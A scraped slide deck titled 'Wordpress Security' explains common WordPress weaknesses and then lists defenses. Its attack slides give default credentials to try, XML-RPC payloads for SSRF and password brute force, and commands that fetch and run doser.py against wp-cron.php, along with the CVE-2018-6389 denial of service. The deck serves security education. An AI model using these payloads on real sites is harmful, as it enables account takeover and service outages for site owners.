Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Wordpress Security

2d1ae5ea9354a50d87b46f4503d11f4e?s=47 Tuhin Bose
December 03, 2021

Wordpress Security


Tuhin Bose

December 03, 2021


  1. Wordpress Security By Tuhin Bose

  2. Who am I?

  3. Conclusion & QNA Conclusion & QNA What is Wordpress? What

    is Wordpress? Why Wordpress? Why Wordpress? Hacking Wordpress Hacking Wordpress AGENDA Security Measures Security Measures
  4. What is Wordpress?

  5. Free and Open Source CMS Use to create a beautiful

    website Written in PHP and paired with a MySQL or MariaDB database. Simple, Flexible, User Management, Easy to setup and upgrade
  6. Why Wordpress?

  7. As of 2021, there are about 1.3 billion total websites

    on the web. More than 455 million sites use WordPress. Bunch of themes and plugins. Lack of awareness. Vulnerable by default. 1. 2. 3. 4.
  8. Hacking Wordpress

  9. Detection Wappalyzer

  10. Default Credentials Administrator Editor: Publish and manages his and others

    posts. Author: Publish and manage his own posts. Contributor: Write and manage his posts but cannot publish them. Subscriber: Browse posts and edit their profile. User Permissions: 1. 2. 3. 4. 5.
  11. Default Credentials Login page: /wp-login.php Try default credentials: admin:admin admin:password

    guest:guest ...
  12. xmlrpc.php Location: /xmlrpc.php XML-RPC is a feature of WordPress that

    enables data to be transmitted, with HTTP acting as the transport mechanism and XML as the encoding mechanism. Let's say you want to post to your website from your mobile device. You could use the remote access feature enabled by xmlrpc.php to do just that. We'll try to achieve SSRF and Bruteforce.
  13. xmlrpc.php List methods: <methodCall> <methodName>system.listMethods</methodName> <params></params> </methodCall> We're interested in

    pingback.ping & wp.getUsersBlogs
  14. xmlrpc.php SSRF using pingback.ping: <methodCall> <methodName>pingback.ping</methodName> <params><param> <value><string>http://xyz.burp.net:80</string></value> </param><param><value><string>http://target.com/</string> </value></param></params>

  15. xmlrpc.php Brute Force using wp.getUsersBlogs: <methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>admin</value></param> <param><value>pass</value></param>

    </params> </methodCall>
  16. Denial of Service (DoS) /wp-cron.php When this file is accessed,

    a heavy MySQL query is performed, so it could be used by attackers to cause a DoS. By default, the wp-cron.php is called on every page load (anytime a client requests any Wordpress page), which on high-traffic sites can cause problems (DoS).
  17. Denial of Service (DoS) /wp-cron.php Detection: Blank page with 200

    OK response. Exploitation: Open your terminal and enter the following command: i. wget https://raw.githubusercontent.com/Quitten/doser.py/master/doser.py ii. python3 doser.py -t 999 -g 'https://target.com/wp-cron.php'
  18. Denial of Service (DoS) /wp-cron.php Detection: Blank page with 200

    OK response. Exploitation: Open your terminal and enter the following command: i. wget https://raw.githubusercontent.com/Quitten/doser.py/master/doser.py ii. python3 doser.py -t 999 -g 'https://target.com/wp-cron.php'
  19. Denial of Service (DoS) CVE-2018-6389 WordPress allows users to load

    multiple JS files and CSS files through load-scripts.php files at once. For example, https://example.com/wp-admin/load-scripts.php?c=1&load%5B%5D=jquery- ui-core,editor&ver=4.9.1, file load-scripts.php will load jquery-ui-core and editor files automatically and return the contents of the file. However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks. For example, if you use the below payload then it'll cause 4.11 Mb of data to be transferred b/w the server and the user. So if the attacker sends 10,000 requests then it would result in transferring 41100 Mb (42Gb) from the server to the user which would cause a Denial of Service attack to the server.
  20. Denial of Service (DoS) Payload: https://pastebin.com/hATmX1pk Exploitation: Use doser.py

  21. Automation WPScan/CMSmap CMSmap: CMSmap is a Python open source CMS

    scanner that automates the method of detecting security flaws of the foremost popular CMSs. The main purpose of this tool is to integrate common vulnerabilities for different types of CMSs into a single tool. cmsmap https://example.com
  22. Automation WPScan/CMSmap WPScan: WPScan is a WordPress security scanner written

    for security professionals and blog maintainers to test the security of their WordPress websites.
  23. Automation WPScan - Getting API Token

  24. Automation Basic Scan: wpscan --url https://target.com/ Detect All Themes: wpscan

    --url https://target.com/ -e at Detect All Plugins: wpscan --url https://target.com/ -e ap Detect Vulnerable Themes: wpscan --url https://target.com/ -e vt --api-token <API> Detect Vulnerable Plugins: wpscan --url https://target.com/ -e vp --api-token <API>
  25. Time for Practical stuffs

  26. Security Measures

  27. Disable xmlrpc manually or using some plugin. Disable wp-cron by

    updating wp-config.php: define('DISABLE_WP_CRON', true); Protect from CVE-2018-6389 by modifying .htaccess: 1. 2. and configure a regular system cronjob. 1. <Files load-scripts.php> Order allow, deny Deny from all </Files> 4. Update wordpress core, themes and plugins time to time. 5. Hide the detault login page/allow from few ip addresses. 6. Use reCAPTCHA on sensitive actions. 7. Always take a backup of your site. 8. Use a strong password and enable 2fa on every accounts. Security Measures
  28. Twitter: @tuhin1729_ | Medium: @tuhin1729 | Instagram: @tuhin1729 Thank You!

    Thank You! Thank You!